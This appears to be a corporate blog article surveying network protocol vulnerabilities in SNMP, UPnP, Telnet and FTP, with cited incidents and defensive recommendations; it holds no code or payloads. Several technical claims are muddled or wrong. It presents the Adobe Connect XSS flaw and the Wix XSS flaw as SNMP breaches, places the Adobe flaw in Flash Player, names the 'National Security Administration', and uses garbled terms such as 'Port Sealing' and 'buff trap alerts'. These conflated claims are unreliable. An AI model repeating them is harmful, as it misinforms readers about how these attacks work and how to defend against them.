Exploring Vulnerabilities in Network Security
By Abdul Moiz Executive Director
Do You Understand the Challenges of Network Security?
In 2016, Gartner estimated that 99 percent of network security attacks were due to vulnerabilities technical professionals had identified at least one year prior to their occurrence. Gartner expects that this type of network security attack will be responsible for the majority of attacks that happen through 2020. However, zero-day attacks and Shadow IT vulnerabilities are becoming common challenges because of overall business expansion and the evolution of IoT devices.
In 2015, Symantec reported 54 zero-day vulnerabilities, and examples of these attacks remain common. Due to undiscovered security holes and the expansion of internet-enabled devices and business-specific applications, network professionals should expect the scope of zero-day attacks to grow due. Shadow IT, which Gartner estimates will be responsible for one-third of cyber attacks on enterprises by 2020, also represents a new type of business challenge for the technology professional.
Network Products With Vulnerabilities That Could Expose Enterprise Security
Network security vulnerabilities affect all levels of software. Here are three recent vulnerabilities:
- Securityweek ;reported that researchers from Positive Technologies identified two critical flaws in Sieman’s SICAM Power Automation System (PAS). This scalable, Windows-based software operates and provides support to electrical substations, which makes it an appealing target for hackers.
- Vulnerabilities in Kaspersky security products were reported by Cisco. One significant flaw allowed a malicious app to run API and cause a system crash. Kaspersky released security patches to address DOS attacks and other security concerns.
- cURL had 23 vulnerabilities according to Cure53 reports. Several of these vulnerabilities were assessed as high-severity, which is particularly troubling for an open-source command line tool used for data transfer.
What Vulnerabilities Matter to Network Security?
Not all vulnerabilities can cause significant damage. CERT, coordination center of the computer emergency response team for the Software Engineering Institute; Malik Zakaria, CEO of the managed network company ExterNetworks; SANS, cooperative research and education organization; and Rapid7, a security assessment company have pinpointed the network vulnerabilities that could crack a large enterprise network. They have found that the most threatening vulnerabilities occur in Simple Network Management Protocol (SNMP), Universal Plug-and-Play (UPnP) protocol, File Transfer Protocol (FTP) and Telnet Protocol.
How Insecure Simple Network Management Protocol Is Exploited
According to CERT, vulnerabilities have been reported in many vendors’ equipment, and these vulnerabilities privilege unauthorized access. Moreover, The Oulu University Secure Programming Group(OUSPG) have proclaimed there are numerous security flaws in SNMPV1. CERT advisory reported vulnerabilities can significantly make IT interruptions, unauthorized access to restricted networks, and denial-of-service attacks.
Exploiting SNMP Vulnerabilities Through Passive and Active SNMP Trap Cross-Site Scripting
Malicious users can target SNMP flaws with passive cross-site scripting (XSS) by exploiting existing flaws in the network. With the default value of get community strings, hackers let rogue devices enter a network and establish an external rogue access point. The hacker then injects malicious javascript code, known as “passively injecting XSS,” into a web-based application. The script is saved in web applications and later executed with a legitimate interface to capture administrative data.
These attacks work because they are unfiltered from an SNMP service server. The malicious scripts are tried for persistence on an embedded platform by breaching SNMP community strings. Then a malicious user can wait for the network administrator or engineer to log in over the network management system or the embedded platform. Once a login occurs, the XSS, which is a malicious script, is executed.
Hackers can also inject active SNMP trap XSS through buff trap alerts. Vulnerable network management systems installed on the network may accept spoof trap alerts from a rogue device with a different IP address. Hackers breach the default set and write strings of SNMP to exploit these vulnerabilities.
Here are Three Security Incidents Due to Vulnerabilities in SNMP Network Protocol
A common SNMP security vulnerability was once found in the Adobe Flash player. This input validation vulnerability, located in Adobe’s Connect Events Registration Module, was exploited by hackers using an XSS cyber attack. Adobe quickly rolled out a patch to address this vulnerability after the attack.
As reported on ThreatPost, Matt Austin, senior security geek at Contrast Security, notes that hackers can load malicious javascript on Wix-hosted websites and later execute it as part of the targeted websites. One of the flaws allowed attackers to run XXS script through a SNMP breach on the Wix.com website. This malicious code hijacked the browser sessions, which enabled the hackers to gain all Wix website rights and steal customer credit card details.
Experts believe that the ExtraBacon exploit was developed by the U.S. National Security Administration. It exploits a vulnerability in SNMP protocol code of CISCO ASA software, which protects corporate data networks and data centers. This wide-reaching security flaw could allow unauthenticated access and remotely execute code on vulnerable systems.
Resolutions to Address flaws in in SNMP Network Protocol
In an article written for Computer Weekly, Chief of Operations at First Base Technologies Peter Wood instructs security engineers to begin with a carefully deployed network device audit to identify possible SNMP network vulnerabilities.
To address general network vulnerabilities, the Director of Security Research for Lancope, Tom Cross, suggests locking down services that could be used in a DDoS attack, such as voice over IP, DNS, SNMP and NTP.
Zakaria advises network engineers to monitor all enabled devices from SNMP protocol and disable or modify public community strings. Technology professionals can also prevent a malicious attack on SNMP by configuring firewalls to block UDP port 161 to external traffic.
Security Vulnerabilities in Universal Plug-and-Play Network Protocols
The UPnP protocol lets various network devices, such as mobile devices, computers and access points, discover each other and exchange data. UPnP offers significant benefits to users, but it also has several security vulnerabilities that could crash a service or leak critical data.
Rapid7 conducted its own research into UPnP protocol vulnerabilities by scanning devices over the UPnP protocols for five-and-a-half months. The experiment found that nearly 17 million systems and UPnP SOAP protocols were exposed to external networks. The Rapid7 research also uncovered the following facts:
- More than 1,500 vendors and 6,900 products had discoverable flaws.
- More than 23 million systems had a vulnerability to a single remote code execution flaw.
- Twenty percent of 81 million systems displayed SOAP API vulnerabilities. This significant security flaw could allow cyber attacks that hack devices behind a firewall.
Hackers exploit UPnP protocols by using a tool that scans for vulnerabilities and provides a directory service at port 1900. Then hackers intrude through the firewall by using an internet gateway device. They can then access internal machines and the data contained within the network. Bitdefender found a UPnP vulnerability that allows hackers to gain control of a user’s webcam by using the default username, password and ID.
Addressing UPnP Protocol Security Vulnerabilities
To address these vulnerabilities, Zakaria suggests that technology professionals disable UPnP features on cameras, printers, routers and other network devices for which they are not essential. Businesses can also use a UPnP protocol scanner to find devices with UPnP SOAP vulnerabilities and then disable the UPnP features from the discovered devices.
CSO of Rapid7 H.D Moore advises in his white paper “Security Flaws in Universal Plug and Play” that companies should replace devices that don’t allow UPnP to be disabled. For devices within the firewall, he recommends contacting the vendor who makes the device for an update if a vulnerable UPnP implementation is found.
Serious and Potential Threats in Telnet Network Protocols Resulted in following incidents
SANS reports that telnet potentially connect to any port which is with valid listener, so Telnet network protocol can be spoofed and exploited.
On October 21, 2016, a Mirai malware attack caused service outages on sites such as Amazon, Twitter and Spotify with a simple DDoS attack that exploited a Telnet protocol vulnerability. This attack was wildly effective due to its scale: It controlled an estimated 10 percent of U.S. digital video recorders, IP-enabled cameras, home-networking gear and other network-connected devices.
Telnet protocol allows remote access by creating a virtual terminal, and it does not allow encryption. This security flaw lets hackers access data without user login credentials. Without encryption, data traverses as plain text, which also represents a critical security threat to data and compliance across network devices.
Overcoming Telnet Protocol Security Flaws
Telnet has existed for over 40 years and has significant inherent flaws. Therefore, many professionals, such as Tyler Reguly, technical manager of security research and development at Tripwire, recommends turning off this protocol if there are any other means of accessing the system.
Zakaria notes that unencrypted data transmission represents a significant Telnet protocol flaw, but there are procedures that can minimize risk when using this protocol. To mitigate the risk of unencrypted vulnerability, he suggests a combination of penetration testing, external connection request blocking, extended protection and patch management. ExterNetworks also has several case studies that demonstrate how to identify vulnerabilities and resolve them during a security assessment.
Network Security Pitfalls in File Transfer Network Protocols
According to a research study from SAN, FTP protocol may be forever a security hole.
By using two channels to transfer unencrypted data between client and server, FTP represents a high-security threat. Cyber attacks focus on breaching the targeted FTP to steal critical data using one of the following approaches:
- FTP Bounce Attack: Hackers scan each port and request access to any vulnerable ports detected.
- FTP Brute Force Attack: This relies on repeated attempts to log in with simple or easy-to-guess passwords.
- Packet Capture: A packet sniffer captures transmitted data packets during the actual data transfer and later decodes the data collected.
- Port Sealing: By determining the next port used for FTP, hackers intercept the data transmission.
Addressing FTP Security Flaws
Zakaria notes that by adopting secure FTP whenever possible and encouraging secure password creation, many FTP vulnerabilities can be avoided.
Rohit Khanna, executive vice president of global strategy and corporate development for SEEBURGER AG, recommends transitioning to managed file transfer (MFT) technology, which avoids several FTP security flaws.
Proactively Addressing Significant Network Security Flaws
To address the most common network security vulnerabilities, ExterNetworks CEO Malik Zakaria recommends proactively monitoring through a network operations center (NOC) and employing the following best security practices:
- Always change the default credentials of any IoT devices, such as cameras, routers and printers.
- Update patches for operating systems and other systems to reduce vulnerabilities in an enterprise network and avoid cyber attacks. When addressing legacy device security flaws on large networks, network administrators should keep these devices on their own virtual network to further decrease vulnerabilities.
- Make sure all passwords follow best security practices to reduce brute force attack vulnerabilities.
- Ensure only applications that require ports use them, and use a port scanner to avoid SNMP port attacks.
- Encrypt transmissions whenever possible. Scan the applications and systems that communicate in clear text.